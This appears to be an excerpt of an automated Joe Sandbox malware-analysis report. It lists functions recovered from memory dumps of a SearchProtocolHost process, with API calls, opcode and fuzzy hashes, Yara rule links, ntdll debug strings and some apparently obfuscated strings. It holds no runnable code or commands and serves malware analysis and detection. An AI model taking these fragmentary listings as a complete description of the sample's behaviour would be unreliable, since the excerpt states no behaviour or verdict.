                                                                                  • Opcode ID: 855b8d50a8016bda6a6a97f31ff92b957c90bbdca47c53022890a0e2a56f69ba
                                                                                  • Instruction ID: dc39345fea59a18dd7ddf87d87fe162ba916f4c4063bb18ce819e148063072b4
                                                                                  • Opcode Fuzzy Hash: 855b8d50a8016bda6a6a97f31ff92b957c90bbdca47c53022890a0e2a56f69ba
                                                                                  • Instruction Fuzzy Hash: 51E086712802046FEB1467ACDC81B663399CF48769F144A50F82CDB2C1DA7EF5164560
                                                                                  Function 02A28619 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02A28648
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: f738cbb425e611d8e9e269ad94cf466be0197022c3636d257a479034ed59d302
                                                                                  • Instruction ID: e654f362ef425bc7adcd97dc9fd67f75877831ad06800bca081d1f1c805b3a06
                                                                                  • Opcode Fuzzy Hash: f738cbb425e611d8e9e269ad94cf466be0197022c3636d257a479034ed59d302
                                                                                  • Instruction Fuzzy Hash: 25E0DF302402046BEB286B68CC81B6533588F49325F144A50F96C8B2C2DF7EE52A46A0
                                                                                  Function 02A28407 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02A22030,02A3816F,02A3582F,02A21FF6), ref: 02A2843F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 119c9e1f68007de04e482f7eb05232315956690a884a29b287f5bc2f0f46cb40
                                                                                  • Instruction ID: 1ff2ab8b9ea9095f70ab508794916f1f908b5e7d5fec6aaf0b5a402a3ef522c4
                                                                                  • Opcode Fuzzy Hash: 119c9e1f68007de04e482f7eb05232315956690a884a29b287f5bc2f0f46cb40
                                                                                  • Instruction Fuzzy Hash: A5E0C2306C02423BF741FBA48E81B197B8A9B10B45F14008CB94CEA2C6CE59E1148A61
                                                                                  Function 02A28410 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02A22030,02A3816F,02A3582F,02A21FF6), ref: 02A2843F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: bfd20958474ed37cd433a6109d1ad55ec62e432b419dd531c5f2b1d0db490eae
                                                                                  • Instruction ID: 633715a2acdf1eb793f0574a413e8873925173bc73d78661d35b8450064f77ce
                                                                                  • Opcode Fuzzy Hash: bfd20958474ed37cd433a6109d1ad55ec62e432b419dd531c5f2b1d0db490eae
                                                                                  • Instruction Fuzzy Hash: 86D05E716C02053BFA50B6A89C82F16328E9B54B91F104054BA0CEA2C0DD59F00049A6
                                                                                  Function 02A248D3 Relevance: 1.5, APIs: 1, Instructions: 20libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A24892
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                  • Instruction ID: d1f875d3cb43da33891daf6be89057e1b74d373d78438599745ecea66af3179f
                                                                                  • Opcode Fuzzy Hash: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                  • Instruction Fuzzy Hash: 50E05B79A5014EEBEB40CBC4C881FEDB3B4EB0C208F105285F91CD7240D630EA45CB41
                                                                                  Function 03242C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b8cf2752db765ccfaac3f949200ad99df3389d25d981ca5b41814db9233aab51
                                                                                  • Instruction ID: 8cd8da46ccf264a6b667754784d760204592a9a8078d511aeb071fcb1aaaa2b2
                                                                                  • Opcode Fuzzy Hash: b8cf2752db765ccfaac3f949200ad99df3389d25d981ca5b41814db9233aab51
                                                                                  • Instruction Fuzzy Hash: 36B09B719115D5C5DA15E7604608717790467D0701F1AC461F3030641E4779C1D1E575

                                                                                  Non-executed Functions

                                                                                  Function 035204E8 Relevance: .1, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4521090324.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_3520000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dffcfc8d1bf7d449985e0110806286dec676aaf9a09f9f4bc9e2fc368ace8b7d
                                                                                  • Instruction ID: c6721dd5164c17c5ee15ec3de17deb47469eab85e5e8aaacc804e6a7c70d50a6
                                                                                  • Opcode Fuzzy Hash: dffcfc8d1bf7d449985e0110806286dec676aaf9a09f9f4bc9e2fc368ace8b7d
                                                                                  • Instruction Fuzzy Hash: 6941F970609B1E4FD368EF68E081676B7F1FF86300F50052DD98AC36A2E774E8468785
                                                                                  Function 0352DFFA Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4521090324.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_3520000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3558027158
                                                                                  • Opcode ID: 6cba4c29fe6eb188de62f531a6f215d18f64100a94d38c6df01c95bdf134c95a
                                                                                  • Instruction ID: 9c3ff013d5f84f45b873579d03579a0dc0e638923bca73f6b76bc1ad0ef11810
                                                                                  • Opcode Fuzzy Hash: 6cba4c29fe6eb188de62f531a6f215d18f64100a94d38c6df01c95bdf134c95a
                                                                                  • Instruction Fuzzy Hash: DC914FF04082988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                  Function 03523CAE Relevance: 33.8, Strings: 27, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4521090324.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_3520000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $Web$($hm$*661$*7*6$,FF5$-$Et$-$Ra$/$,O$1*4$$173*$3*71$4?$P$6$Ik$71/$Ik~m$LPIH$afOm$agok$evm+$fmha$hhe+$j+54$kqgl$oa$C$p+17$thaS$vwmk
                                                                                  • API String ID: 0-132586805
                                                                                  • Opcode ID: e48f924f4b741f707bdc201864ba7c3de32ecc9d62ad808335acddf26c4cf2b9
                                                                                  • Instruction ID: 4b8acf8a9de542c0c6830696e0e6ea22a8a7078ca54f694ece776e5459760d9b
                                                                                  • Opcode Fuzzy Hash: e48f924f4b741f707bdc201864ba7c3de32ecc9d62ad808335acddf26c4cf2b9
                                                                                  • Instruction Fuzzy Hash: 0941A6B450470CDBCF28EF04E545AED7BB0FF01304F815269E909AE2A1DB358696CB85
                                                                                  Function 03242890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: e75dc2ff29e39c18d3cb83d1b0ef01e5c65f781ce1c8d34c3cf985a7516d0fae
                                                                                  • Instruction ID: af2c3a222983c4abd5758a93d262297c6601b315871d4ce006e4f5bc3fde3943
                                                                                  • Opcode Fuzzy Hash: e75dc2ff29e39c18d3cb83d1b0ef01e5c65f781ce1c8d34c3cf985a7516d0fae
                                                                                  • Instruction Fuzzy Hash: BF51E7B6A20216FFCB14DF99C89097EFBB8BB082417148669F465D7641D374DE908BA0
                                                                                  Function 032B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: a680f2faa8f26d2efcfd635627ad7a6eec177ed0a5b8a29fb556a027611febe3
                                                                                  • Instruction ID: b83e4b823cec601959db2cc5258bda946b28c97e19374ce7b767a46765ca314a
                                                                                  • Opcode Fuzzy Hash: a680f2faa8f26d2efcfd635627ad7a6eec177ed0a5b8a29fb556a027611febe3
                                                                                  • Instruction Fuzzy Hash: 8E51F5B5A10746EFCB24DE5CC8909BFB7FDEB48340B088C59E5A5D7641D7B4EA808760
                                                                                  Function 03237630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • ExecuteOptions, xrefs: 032746A0
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03274787
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032746FC
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03274655
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03274725
                                                                                  • Execute=1, xrefs: 03274713
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03274742
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: eb239e131f992175188575ff552ae5960b100d10f62c553a58d497cc320998e8
                                                                                  • Instruction ID: 4cd9f7088752fbaea9ba04401998fbfcba9b08ae8be0dc2dac355d6126b12669
                                                                                  • Opcode Fuzzy Hash: eb239e131f992175188575ff552ae5960b100d10f62c553a58d497cc320998e8
                                                                                  • Instruction Fuzzy Hash: 3E5107F566031A7BDF14EBA9EC99FAE73A8EF09310F0400A9D505AB181D7B19AC5CF50
                                                                                  Function 0324B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: b54552a0e6db7e74d1487aae5e9871d2041a69f74f6d11230ee5004b696edaee
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: BC81BE35E2524A9ADF2DCF68C9917FEBBA6AF45320F1C4259D8E1A7390C674C8C0CB50
                                                                                  Function 032B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: 71d1a66a713a742185c8d27700aa89c25d70338de3a1929f5ea5c4b66a6d11b6
                                                                                  • Instruction ID: 05ff8c0bf04ecfc6e1a58b2e4c2f1621e18011630fa5f8bf53ffb1401c95cc84
                                                                                  • Opcode Fuzzy Hash: 71d1a66a713a742185c8d27700aa89c25d70338de3a1929f5ea5c4b66a6d11b6
                                                                                  • Instruction Fuzzy Hash: 95215376A20319ABCB10DE69DC40AEEB7F8EF44784F080516E915E7201E770DA428BA1
                                                                                  Function 0322F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032702BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032702E7
                                                                                  • RTL: Re-Waiting, xrefs: 0327031E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 842d5a2117beac6071f92862a414a23dede4977f11f8ae8e913e4bbceac4b1b4
                                                                                  • Instruction ID: 427ba5548b9bcca4e84fb3f27e1200725e49c8835b59d5f3e57fa3acc58388cd
                                                                                  • Opcode Fuzzy Hash: 842d5a2117beac6071f92862a414a23dede4977f11f8ae8e913e4bbceac4b1b4
                                                                                  • Instruction Fuzzy Hash: 34E1AF31624742AFD725CF28C984B2ABBF0FB44714F184A6DF5A58B2D1D7B4D984CB42
                                                                                  Function 0323BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03277B7F
                                                                                  • RTL: Resource at %p, xrefs: 03277B8E
                                                                                  • RTL: Re-Waiting, xrefs: 03277BAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 63f1e7cae81768c6b6b5b368e60fca6c66dced1ad7ba7ba8d14ae684b44c8ce7
                                                                                  • Instruction ID: a1844c3743e8a311343fd4c5519365ad673b1a97c6d2442102b9c0314dadec59
                                                                                  • Opcode Fuzzy Hash: 63f1e7cae81768c6b6b5b368e60fca6c66dced1ad7ba7ba8d14ae684b44c8ce7
                                                                                  • Instruction Fuzzy Hash: 1441F3753217039FC724DE29C840B6AB7E5EF8A721F140A2DF95ADB280DB71E4858B91
                                                                                  Function 0323B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0327728C
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 032772A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03277294
                                                                                  • RTL: Re-Waiting, xrefs: 032772C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: aee1f61436d26baf1ea5656d04acf9b37f6b293ab3932a4d6cdd3f13b8504bcf
                                                                                  • Instruction ID: 0547e7cee42b08b3b6ac6f46e750676258eb85fabcaf8bf7016737d41e8c8c64
                                                                                  • Opcode Fuzzy Hash: aee1f61436d26baf1ea5656d04acf9b37f6b293ab3932a4d6cdd3f13b8504bcf
                                                                                  • Instruction Fuzzy Hash: 2F41F075720302AFC720DE29CC41F6AB7A5FF85B11F140619FD65AB280DB71E88287D0
                                                                                  Function 032B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 3127cc067aa7755880129b8467ae7863982676bfde4fa94eaab86ee6ffd25d71
                                                                                  • Instruction ID: a69506941da688d7d819ec5cdc94238d4c5b64047c9683b7c05e68647f375697
                                                                                  • Opcode Fuzzy Hash: 3127cc067aa7755880129b8467ae7863982676bfde4fa94eaab86ee6ffd25d71
                                                                                  • Instruction Fuzzy Hash: E4314676A10719DFCB20DF29DC40BEEB7B8EB44750F544955E849E7240EB709A858BB0
                                                                                  Function 03247D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: c813db90b2f44fff073440d685b38ddc6a088ec403d43be3987e9f7eff0ac718
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 3D919071E303179ADB2CDE6DC880ABEB7A5BF44720F59461AE875AB2C0D77099C18B50
                                                                                  Function 03209126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 5d0ad6d40fe8dc6205cb7f6015f231772cc39e9b2f406a5fa84fd00d4183b096
                                                                                  • Instruction ID: 90f243f13dfe4756c902748efddbe33ef172fd5789e0c0ae27932bece71d67ed
                                                                                  • Opcode Fuzzy Hash: 5d0ad6d40fe8dc6205cb7f6015f231772cc39e9b2f406a5fa84fd00d4183b096
                                                                                  • Instruction Fuzzy Hash: DF814875D10269DBDB35DB54CC44BEAB6B8AF08710F0445EAA90AB7291E7709EC4CFA0